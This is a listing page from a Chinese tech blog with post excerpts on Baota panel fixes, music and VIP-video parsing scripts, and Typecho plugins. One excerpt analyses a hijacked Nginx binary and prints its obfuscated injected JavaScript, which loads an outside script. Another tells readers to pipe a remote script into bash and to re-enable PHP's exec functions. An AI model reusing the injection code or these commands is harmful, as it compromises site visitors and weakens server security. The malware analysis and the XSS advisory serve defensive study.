首页
动态说
留言板
关于我
赞助
友链
更多
站点统计
音乐列表
壁纸
美好往事
技术分享
闲言碎语
资源分享
游戏分享
源码分享
登录
/
注册
关键词搜索
文章搜索
标签搜索
源码
PHP
接口
Typecho
漏洞
宝塔
Python
Windows11
技术分享
易语言
机器人
框架
测评
CDN
软件
解析
网易云音乐
插件
热门文章
1
[游戏分享]美少女万华镜5游戏资源
13,055 阅读
2
[源码分享]随机二次元接口源码-双版本
11,422 阅读
3
[技术分享]小米手机修复基带未知教程
10,285 阅读
4
[搞机教程]小米类原生刷机教程-适合所有小米机
5,826 阅读
5
[技术分享]如何绕过CF节点以及其他节点查询源站IP
3,690 阅读
6
[信息安全]关于裸聊APP渗透的一些事情
3,519 阅读
7
[Typecho插件]一款好用的音乐插件APlayer
3,328 阅读
8
[网站分享]情兰API首页改版
2,987 阅读
9
[技术教程]论我是如何通过提取相册站点把旁站挂页
2,888 阅读
苏晓晴
累计撰写
73
篇文章
累计收到
3,478
条评论
今日撰写
0
篇文章
今日已经过去
16
小时
69%
这周已经过去
1
天
14%
本月已经过去
22
天
70%
今年已经过去
8
个月
66%
首页
栏目
美好往事
技术分享
闲言碎语
资源分享
游戏分享
源码分享
页面
动态说
留言板
关于我
赞助
友链
站点统计
音乐列表
壁纸
用户登录
登录
注册
苏晓晴(共73篇)
搜索到
73
篇与
苏晓晴
的结果
2025-01-31
[技术分享]宝塔面板PHP安装IMAP扩展失败解决方法
错误截图解决方法CentOS7下的解决方案为yum install -y libc-client-devel对应的Centos 9/Rhel 9/AlmaLinux 9/RockyLinux 9的安装方式(如果是Centos 8/Rhel 8/Alma Linux 8/Rocky Linux 8系列的,把9替换成8即可)wget http://rpms.remirepo.net/enterprise/remi-release-9.rpm rpm -Uvh remi-release-9.rpm dnf -y --enablerepo=remi install uw-imap-devel然后就可以去安装imap扩展了安装完成后,还需要在PHP-禁用函数中删除imap_open,否则imap模块依然无法连接imap服务器
2025年01月31日
150
1
4
2024-10-14
[Python源码]QQ音乐无损解析开源
使用方法先安装 文件所需要的依赖模块 pip install -r requirements.txt再运行app.py文件即可环境要求Python >= 3请求示例如图箭头显示参数列表请求链接选择 http://ip:port/song 请求方式 GET参数列表参数说明url解析获取到的QQ音乐地址返回数据song[] = 包含歌名 专辑 歌手 图片lyric[] = 包含原文歌词 翻译歌词(如果有)music_urls[] = 包含'm4a', '128', '320', 'flac', 'ape'等歌曲链接其中flac和ape为无损 320为高品质 m4a和128为标准音质Github项目地址{cloud title="QQ音乐无损解析" type="github" url="https://github.com/Suxiaoqinx/tencent_url" password=""/}注意事项请先在app.py中的cookie_str填写入你从y.qq.com获取到的cookie才可以解析!其中 要解析VIP歌曲以及无损以上音质 请获取会员账号的cookie
2024年10月14日
2,150
7
19
2024-10-05
[Python源码]工信部ICP备案查询接口源码-修复
使用方法先安装 文件所需要的依赖模块 pip install -r requirements.txt再运行mainapi.py文件即可环境要求Python >= 3请求示例如图显示参数列表请求链接选择 http://ip:port/query请求方式 GET参数列表参数说明domain域名url地址typecache(则缓存) 为空则不缓存感谢Ravizhan 原项目地址Github地址{cloud title="ICP备案查询" type="github" url="https://github.com/Suxiaoqinx/icp_api" password=""/}备注官网反爬策略较为玄学,请勿疯狂请求运行结果为原始响应,如有需要请自行解析
2024年10月05日
285
2
2
2024-08-15
[Typecho插件]Typecho上传图片自动转为Webp/Avif格式插件
文章前言插件目前支持 GD imagemagick ffmpeg压缩库插件设置使用说明解压后修改文件夹名为 SwitchImges,将插件上传至网站目录的 /usr/plugins 下在 Typecho 后台「插件管理」处启用插件如果想要上传源格式 禁用插件即可!PHP有GD/imagemagick/ffmpeg扩展 一般GD和imagemagick扩展宝塔默认都自带 自行安装即可在PHP禁用函数一栏删掉shell_exec和exec函数Typecho 1.2.1 和 PHP7 以上均支持ffmpeg安装 执行这个命令即可bash <(curl https://gitee.com/baihu433/ffmpeg/raw/master/ffmpeg.sh)下载地址{cloud title="SwitchImges插件V1.3" type="lz" url="https://suxiaoq.lanzoul.com/iscM12m4puhg" password=""/}更新日志{collapse}{collapse-item label="2025.1.28 V1.3"}备份文件改为固定路径:/usr/uploads/年份/月份/backup禁用插件的时候 一并将所有备份的文件&目录全部删除{/collapse-item}{collapse-item label="2024.9.6 V1.2"}增加avif格式转换增加ffmpeg库去除cwebp库支持支持生成源文件备份(此版本从V1.0 V1.1更新上来之前必须禁用插件 然后再上传新的插件 启用){/collapse-item}{collapse-item label="2024.8.15 V1.1"}支持GIF转换为动态WebP增加imagemagick cwebp库调整底层代码 增强通读性{/collapse-item}{collapse-item label="2024.8.15 V1.0"}版本初构建 支持(JPG|PNG|GIF|JPGE){/collapse-item}{/collapse}
2024年08月15日
641
2
6
2024-07-28
[PHP源码]PHP最新获取QQ昵称源码
接口说明本接口来源于官方源码分享<?php function get_qq_nick($qqCode) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'https://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=' . $qqCode); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_CUSTOMREQUEST, 'GET'); curl_setopt($curl, CURLOPT_POSTFIELDS, '------WebKitFormBoundaryYTwvlk5brGmyD3Mn'); curl_setopt($curl, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=---011000010111000001101001', ]); $response = curl_exec($curl); $encode = mb_detect_encoding($response, array("ASCII", 'UTF-8', "GB2312", "GBK", 'BIG5')); $response = mb_convert_encoding($response, 'UTF-8', $encode); $name = json_decode(substr($response, 17, -1), true); curl_close($curl); return $name[$qqCode][6]; } echo get_qq_nick('3074193836'); ?>注意事项如果上传了没法使用 请检查服务器环境1.是否为国内服务器(不是必须)2.PHP环境是否为7-83.服务器是否正确安装环境
2024年07月28日
322
3
6
2024-01-14
[技术教程]宝塔Nginx开启支持HTTP3/QUIC协议 - 简易教程
报错解决如果提示以下报错[warn] the listen ... http2请根据报错的站点内配置文件把 ssl http2 中的http2去掉如果想要开启HTTP2的话 请看下面的站点配置 http2 on单独添加进去即可注意事项博主测试过Let's Encrypt和Zerossl以及TrustAsia的免费证书这三款都支持QUIC协议 其他证书理论也是支持的!准备工作已经安装好宝塔面板和Nginx环境HTTP3/QUIC检测地址 http3check.net教程开始自编译教程 - 点击这个 {message type="success" content="宝塔最新已经支持Nginx 1.25 直接安装即可"/}在ssh里面执行以下命令wget https://download.bt.cn/install/0/nginx5.sh bash nginx5.sh install 1.25等待命令执行完毕 进面板查看 Nginx版本是否为1.25站点配置在所有的 server 域中,只需要有一个 server 域中配置 reuseport 选项即可listen 443 ssl; listen 443 quic reuseport; listen [::]:443 ssl; listen [::]:443 quic reuseport; http2 on;其他的 如下配置即可listen 443 ssl; listen 443 quic; listen [::]:443 ssl; listen [::]:443 quic; http2 on;在站点的Nginx配置文件 大概26 27行添加以下代码ssl_early_data on; add_header Alt-Svc 'h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"';然后重启 Nginx即可生效!防火墙配置防火墙将443端口UDP开放 宝塔在面板-左侧安全里面配置 腾讯云 / 阿里云 / 华为云 等 添加安全组即可浏览器配置谷歌Chrome浏览器 访问:chrome://flags/ 启用:Experimental QUIC protocol (enable-quic) 微软新版Edge浏览器 访问:edge://flags 启用:Experimental QUIC protocol 设置为“Enabled” 火狐Firefox浏览器 访问:about:config 启用:network.http.http3.enabled
2024年01月14日
960
4
6
2023-11-02
[PHP源码]获取对方QQ等级接口源码
前言好久不见 甚是想念!这段时间断更了好长一段时间 大概有两三个月了吧这次更新的话 有可能是最后一次更新 主要是服务器到期了 已经不想再续费维护博客了源码截图接口说明cookie来源vip.qq.com请自行在源码内填写获取到的cookie!下载地址隐藏内容,请前往内页查看详情注意事项{callout color="#f0ad4e"}是否为国内服务器(不是必须)PHP环境是否为7-8服务器是否正确安装环境{/callout}让我们有缘再相见吧!晚安啦~
2023年11月02日
496
27
5
2023-07-20
[PHP源码]微信域名拦截检测接口源码
接口说明本源码接口抓取于 微信客户端请勿频繁请求 导致IP被限制拉黑源码截图下载地址隐藏内容,请前往内页查看详情注意事项如果上传了没法使用 请检查服务器环境是否为国内服务器(不是必须)PHP环境是否为7-8服务器是否正确安装环境
2023年07月20日
455
11
1
2023-07-09
[PHP源码]工信部ICP备案查询接口源码
文章前言接口已失效!最近爆肝API接口源码 累死了我这几天应该不会再更新了 如果有需要的话 可以QQ找我接口说明本源码接口抓取于 工信部备案系统 请勿频繁请求 导致IP被限制拉黑源码截图下载地址隐藏内容,请前往内页查看详情更新日志{collapse}{collapse-item label="更新日志 10月份" open} {x} 优化代码结构 //2023.10.4 {x} 增加支持网站 APP备案查询 //2023.10.4{/collapse-item}{collapse-item label="更新日志 9月份" open} {x} 修复接口失效问题 //2023.9.3{/collapse-item}{/collapse}注意事项如果上传了没法使用 请检查服务器环境1.是否为国内服务器(不是必须)2.PHP环境是否为7-83.服务器是否正确安装环境
2023年07月09日
551
48
5
2023-07-04
[PHP源码]PHP获取QQ昵称源码
文章前言最近发现网上发的获取QQ昵称接口基本都失效了我重新写了份 应该可以用接口列表{mtitle title="接口1(半失效 取出昵称乱码)"/}http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins={mtitle title="接口2(半失效 验证cookie)"/}http://r.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?g_tk=gtk&uins=源码截图下载地址{cloud title="QQ昵称获取源码" type="lz" url="https://suxiaoq.lanzoul.com/iYtBC117qulc" password=""/}注意事项如果上传了没法使用 请检查服务器环境1.是否为国内服务器(不是必须)2.PHP环境是否为7-83.服务器是否正确安装环境
2023年07月04日
587
4
2
2023-06-23
[Typecho插件]IP归属地显示插件
文章前言插件支持IPV6和IPV4归属地获取并且 为了避免卡顿或者获取失败 数据库都是本地 不调用任何第三方API接口演示图使用说明解压后修改文件夹名为 XQLocation,将插件上传至网站目录的 /usr/plugins 下在 Typecho 后台「插件管理」处启用插件在需要显示的地方插入以下代码:<?php XQLocation_Plugin::render($comments->ip); ?>(此项也适用于后台)如果是系统自带的评论框架找到var/Widget/Comments/Archive.php大概为108行,插入<?php XQLocation_Plugin::render($this->ip); ?>下载地址{cloud title="XQLocation_V1.3.zip" type="lz" url="https://suxiaoq.lanzoul.com/iCQx62fgkieb" password=""/}更新日志{collapse}{collapse-item label="2024.11.18 V1.3"}增加后台评论提交钩子{/collapse-item}{collapse-item label="2024.9.19 V1.2"}添加获取IP来源选项 (站点加了CDN可以选择){/collapse-item}{collapse-item label="2023.7.1 V1.1"}修复关闭IP属地显示之后报错问题增加图标显示开关选项增加IPV4数据库选项修复部分BUG错误{/collapse-item}{collapse-item label="2023.6.23 V1.0"}版本初构建{/collapse-item}{/collapse}
2023年06月23日
1,197
23
13
2023-04-21
[原创源码]网易云无损解析开源
环境编写Python 3.10Flask模块接口列表https://interface3.music.163.com/eapi/song/enhance/player/url/v1源码截图Github项目地址{cloud title="网易云无损解析" type="github" url="https://github.com/Suxiaoqinx/Netease_url" password=""/}网易云无损解析使用方法先安装 文件所需要的依赖模块 pip install -r requirements.txt再运行main.py文件即可参数列表http://127.0.0.1:5000/Song_V1?ids=(填写歌曲链接或者ID)&level=(填写需要解析的音质)&type=(down json text)演示列表在线解析注意事项请先在cookie.txt文件内填入黑胶会员账号的cookie 才可以解析!反馈方法请在Github的lssues反馈 或者到我博客反馈感谢Ravizhan
2023年04月21日
2,359
27
25
2023-04-16
[软件分享]网易云音乐无损解析软件
文章前言此软件源码不是站长编写 我在这里感谢Ravizhan大佬 帮我分析了这么久的源码!!他的 Github 地址 有兴趣可以去看看环境编写Python 3.10接口列表{mtitle title="接口1"/}https://interface3.music.163.com/eapi/song/enhance/player/url/v1{mtitle title="接口2"/}https://interface3.music.163.com/eapi/song/enhance/player/url接口2已增加进软件 需要的可以自己选择解析软件截图更新进度下载以及进度条显示(已完成)让用户自行填入cookie选项(已完成)自行登录获取cookie(已完成)优化软件性能更新日志{collapse}{collapse-item label="2023.7月 更新修复"}{callout color="#f0ad4e"} {x} 接口1新增高清环绕声,沉浸环绕声, 超清母带音质解析 //2023.7.27 {x} 修复输入音乐ID解析报错的问题 //2023.7.27 {x} 修复无头浏览器调用失败问题 //2023.7.27{/callout}{/collapse-item}{collapse-item label="2023.4月 更新修复"}{callout color="#f0ad4e"} {x} 首次更新 //2023.4.16 {x} 增加多接口选择 //2023.4.17 {x} 增加歌名 歌手 图片等获取 //2023.4.17 {x} 音质增加Hires获取 //2023.4.17 {x} 增加了音乐下载和进度条功能 //2023.4.20 {x} 自行登录和手动填入cookie选项 //2023.4.20 {/callout}{/collapse-item}{/collapse}下载地址隐藏内容,请前往内页查看详情使用说明版本V1.3更新日志1.接口1新增高清环绕声,沉浸环绕声, 超清母带音质解析 *2.修复输入音乐ID解析报错的问题3.修复无头浏览器调用失败问题标记*号的是重要更新!
2023年04月16日
2,242
155
29
2023-04-15
[原创源码]汽水音乐解析源码
文章前言本接口来源于 抖音汽水音乐 官网抓取如果解析失效 请反馈 我有空会修复的源码截图下载地址隐藏内容,请前往内页查看详情使用说明解压源码 上传到网站内环境要求 PHP7及以上参数输入type参数内容 json/url参数输入url参数内容 汽水音乐app分享的链接文章后记制作源码不易 转载还请留版权 谢谢!
2023年04月15日
1,810
107
9
2023-03-31
[漏洞预警]Typecho <= 1.2.0 版本评论爆出严重的存储型XSS漏洞
漏洞发现发现于2023年3月25号影响版本Typecho <= 1.2.0 版本https://github.com/typecho/typecho/issues/1545https://github.com/typecho/typecho/issues/1546漏洞复现漏洞公开POC目前 此漏洞公开的POC有:获取Cookie通过404.php写入一句话木马这个漏洞危险系数很高,可以直接前台拿Shell。修复建议更新到最新版 > https://github.com/typecho/typecho/releases/tag/v1.2.1-rc最新版1.2.1Rc已经修复此漏洞,大家应该尽快更新到最新版本。直接从数据库里面删除评论,千万不要从后台删除,否则会被xss代码拿到cookie!
2023年03月31日
616
0
7
2023-03-30
[CDN评测]整理站长使用过的国内CDN合集
文章前言本文基于站长使用过的CDN整理体验评测如有不对的地方 请在底部评论区留言!国内CDN腾讯云官网: https://cloud.tencent.com作为国内知名云服务商 我首推当然就是腾讯云了。老用户每个月都送10G流量包对于个人博客站点而言,已经足够用了而且,活动又多,流量包费用也不贵。奇安信网站卫士官网: https://wangzhan.qianxin.com奇安信网站卫士原本是360旗下的,后来分家了,就自己出来单干了。这家的CDN怎么说呢,说好不好,说差不差,CC和waf防护做得挺好,但缓存不怎么样,给的节点又少。毕竟也不是专注加速的,如果关注防护的话,可以去体验体验。百度云加速官网: https://su.baidu.com作为最早的免费CDN,早期和Cloudflare合作的节点防护挺不错的,后来取消合作了。此CDN分为免费版和专业版,免费版和专业版均支持上传SSL证书,但免费版不支持关闭5秒盾。免费版的节点很少,并且在实际使用中,我遇到的问题就有,时不时会出现指向一个 "IP没法访问" 的问题。酷盾安全官网: https://www.kdun.cn虽然这家CDN投入使用的时间不长,但在站长这几个月的使用时间,非常值得推荐使用。界面UI好看,上手简单方便。不仅有CDN该有的缓存加速效果以及众多Waf规则供你选择,CC防护也很好。文章后言本篇文章就到这里了。以上付费的,我个人推荐追求速度与质量可以选择腾讯云,毕竟大厂嘛,懂得都懂。如果是防御和速度的话,可以选择酷盾安全,本站亲测。免费的,个人推荐奇安信网站卫士和百度云加速,看个人选择吧!
2023年03月30日
800
0
3
2023-03-13
[原创分享]Typecho主题增加文章目录树功能
注意事项本教程需要改的东西众多 请各位备份好主题文件 以免失败无法恢复!本次教程以Joe7.7.1版本 为基础 7.3.6按道理也能用具体演示可以看我博客!教程开始这里我以Joe主题为例 各个主题的不相同 请自行判断在/Joe/post.php内添加以下代码 大概41行<?php if ($this->options->jfloor === 'on') : ?> <?php GetCatalog(); ?> <?php endif; ?>Joe主题的function.php文件在/Joe/core/function.php在 大概290行添加以下代码function CreateCatalog($obj) { global $catalog; global $catalog_count; $catalog = array(); $catalog_count = 0; $obj = preg_replace_callback('/<h([1-6])(.*?)>(.*?)<\/h\1>/i', function ($obj) { global $catalog; global $catalog_count; $catalog_count++; $catalog[] = array('text' => trim(strip_tags($obj[3])), 'depth' => $obj[1], 'count' => $catalog_count); return '<h' . $obj[1] . $obj[2] . ' id="cl-' . $catalog_count . '"><span>' . $obj[3] . '</span></h' . $obj[1] . '>'; }, $obj); return $obj; } function GetCatalog() { global $catalog; $index = ''; if ($catalog) { $index = '<ul>'; $prev_depth = ''; $to_depth = 0; foreach ($catalog as $catalog_item) { $catalog_depth = $catalog_item['depth']; if ($prev_depth) { if ($catalog_depth == $prev_depth) { $index .= '</li>'; } elseif ($catalog_depth > $prev_depth) { $to_depth++; $index .= '<ul>'; } else { $to_depth2 = ($to_depth > ($prev_depth - $catalog_depth)) ? ($prev_depth - $catalog_depth) : $to_depth; if ($to_depth2) { for ($i = 0; $i < $to_depth2; $i++) { $index .= '</li></ul>'; $to_depth--; } } $index .= '</li>'; } } $index .= '<li><a href="#cl-' . $catalog_item['count'] . '" data-href="#cl-' . $catalog_item['count'] . '">' . $catalog_item['text'] . '-h'.$catalog_item['depth'].'</a>'; $prev_depth = $catalog_item['depth']; } for ($i = 0; $i <= $to_depth; $i++) { $index .= '</li></ul>'; } $index = '<div class="j-floor"><div class="contain" id="jFloor" style="top: 126px;"><div class="title">文章目录</div>' . $index . '<svg class="toc-marker" xmlns="http://www.w3.org/2000/svg"><path stroke="var(--theme)" stroke-width="3" fill="transparent" stroke-dasharray="0, 0, 0, 1000" stroke-linecap="round" stroke-linejoin="round" transform="translate(-0.5, -0.5)" /></svg></div></div>'; } echo $index; }然后在/Joe/core/core.php文件大概83行 添加以下代码 if ($self->is('single')) { $self->content = CreateCatalog($self->content); }再然后在/Joe/function.php文件大概920行 添加外观后台设置开关//开启文章目录树显示 $jfloor = new Typecho_Widget_Helper_Form_Element_Select( 'jfloor', array( 'off' => '关闭(默认)', 'on' => '开启', ), 'off', '是否启用文章目录树显示', '介绍:开启之后 在文章最左侧显示目录树(手机端不显示)' ); $jfloor->setAttribute('class', 'joe_content joe_post'); $form->addInput($jfloor->multiMode()); 解压所需的文件将以下压缩包解压到/Joe/assets目录内解压完 然后打开post.php引用解压的文件 jfloor.min.css以及jfloor.min.js在头部引用css <link href="<?php _getAssets('assets/css/jfloor.min.css'); ?>" rel="stylesheet"> 在底部引用js <?php if ($this->options->jfloor === 'on') : ?> <!-- 目录树 --> <script src="<?php _getAssets('assets/js/jfloor.min.js'); ?>"></script> <?php endif; ?>{cloud title="Joe目录树" type="lz" url="https://suxiaoq.lanzoul.com/iDI480pzgrih" password=""/}
2023年03月13日
383
1
3
2023-02-17
[源码分享]腾讯视频VIP解析源码接口
文章前言本接口来源于腾讯视频官网抓取如果解析失效或者VIP解析不出来 请更新会员cookie!源码截图源码下载隐藏内容,请前往内页查看详情参数列表url=输入你的视频地址type=json/dplayer例如以下url/?url=视频地址&type=json/dplayer使用说明下载 上传到服务器 解压即可使用
2023年02月17日
1,219
116
5
[技术分享]宝塔面板Nginx异常事件解析
事件经过前几天在Hostloc论坛上看到的 https://hostloc.com/thread-1111691-1-1.html宝塔上也有人反馈https://www.bt.cn/bbs/thread-105054-1-1.htmlhttps://www.bt.cn/bbs/thread-105085-1-1.html宝塔官方公告https://www.bt.cn/bbs/thread-105121-1-1.html样本解析查看病毒样本和被插入的JS代码{mtitle title="原混淆代码"/}var _0x2551=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x65\x74\x61\x6D\x61\x72\x6B\x65\x74\x2E\x71\x75\x65\x73\x74\x2F\x6D\x61\x72\x6B\x65\x74\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x7338x2,_0x7338x3,_0x7338x4){var _0x7338x5= new Date();_0x7338x5[_0x2551[1]](_0x7338x5[_0x2551[0]]()+ _0x7338x4);document[_0x2551[2]]= _0x7338x2+ _0x2551[3]+ _0x7338x3+ _0x2551[4]+ _0x7338x5[_0x2551[5]]()}setc(_0x2551[6],_0x2551[7],360);document[_0x2551[9]](unescape(_0x2551[8]));{mtitle title="解混淆代码"/}var _0x2551 = ["getMinutes", "setMinutes", "cookie", "=", ";expires=", "toUTCString", "waf_sc", "5889647726", "%3Cscript src='https://www.metamarket.quest/market.js'%3E%3C/script%3E", "write"]; function setc(_0x7338x2, _0x7338x3, _0x7338x4) { var _0x7338x5 = new Date(); _0x7338x5[_0x2551[1]](_0x7338x5[_0x2551[0]]() + _0x7338x4); document[_0x2551[2]] = _0x7338x2 + _0x2551[3] + _0x7338x3 + _0x2551[4] + _0x7338x5[_0x2551[5]](); } setc(_0x2551[6], _0x2551[7], 360); document[_0x2551[9]](unescape(_0x2551[8]));在解码完这个JavaScript代码 我们可以看到关键词符 "Write" 和 "%3Cscript src='https://www.metamarket.quest/market.js'%3E%3C/script%3E" (%3C和%3E是HTML编码 转过来则是<和>)此代码直接利用 document.write 向页面插入script标签<script src='https://www.metamarket.quest/market.js'></script>排查分析由于宝塔官方没有明确说明面板存在0day漏洞,目前只能转向分析Nginx样本了我们把被替换过的nginx病毒样本拖到ida里面 然后F5反编译一下 定位到 __int64 __fastcall sub_4BE051 函数然后我们会看到一段 waf_sc=5889647726 这里则对应我们上面分析JavaScript代码的值我们分析一下以下代码 if ( a1[99] && a1[98] ) { if ( ngx_strcasestrn(a2, "admin", 4LL) || ngx_strcasestrn(a2, "user", 3LL) || ngx_strcasestrn(a2, "manager", 6LL) || ngx_strcasestrn(a2, "api", 2LL) || ngx_strcasestrn(a2, "config", 5LL) || ngx_strcasestrn(a2, "login", 4LL) || ngx_strcasestrn(a2, 7689484LL, 3LL) || ngx_strcasestrn(a2, ".xml", 3LL) || ngx_strcasestrn(a2, ".css", 3LL) ) { sprintf(v11, "return 3 url:%s method:%d", a2, a1[122]); sub_4BDFE1(v11); result = 3LL; } else { v9 = access("/tmp/systemd-private-56d86f7d8382402517f3b5-jP37av", 0); result = 6LL; if ( v9 != -1 ) { v10 = access("/var/tmp/systemd-private-56d86f7d8382402517f3b51625789161d2cb-chronyd.service-jP37av", 0) == -1; result = 7LL; if ( !v10 ) result = 0LL; } } } else { sub_4BDFE1("return 2"); result = 2LL; }从这里,我们就能很清楚的看到了, 「v9」和 「v10」这两个变量应该就对应了恶意代码,通过 access 方式读入文件,不过按照被感染后的代码逻辑,应该是先判断是否包含以下字符串,没有就输出恶意代码。'admin' 'user' 'manager' 'api' 'config' 'login' '/var/tmp/msglog.txt' '.xml' '.css'关于 「 ngx_strcasestrn 」函数的用法,大家在网上也能够搜得到。补救措施博主推荐以下的排查方式 如下1.请手动排查一下 /tmp/ 和 /var/tmp/ 目录下有没有 systemd-private-56d86f7d8382402517f3b5-jP37av 这个文件,如果有请尽快删除掉 然后修改一下服务器密码和修改相关目录的权限2.如果当前宝塔面板还在用的话,请修改面板端口以及加强一下面板安全性 3.开启 BasicAuth认证 和 动态口令认证或者访问设备验证 4.手动排查一下Nginx程序的MD5值是否对应在ssh输入以下代码即可md5sum /www/server/nginx/sbin/nginx md5sum /www/backup/nginxBak cat /www/server/panel/data/nginx_md5.pl
2022年12月13日
591
2
0
2022-11-09
[原创程序]查看你的群数量程序源码
前言网站UI来源于AE墨渊的聚合小工具扫码登录功能来源于彩虹的源码非常感谢!测试站点查看你的群数量程序截图源码下载隐藏内容,请前往内页查看详情使用方法下载 上传到服务器 解压即可使用
2022年11月09日
552
15
2
1
2
...
4
支付宝
微信
QQ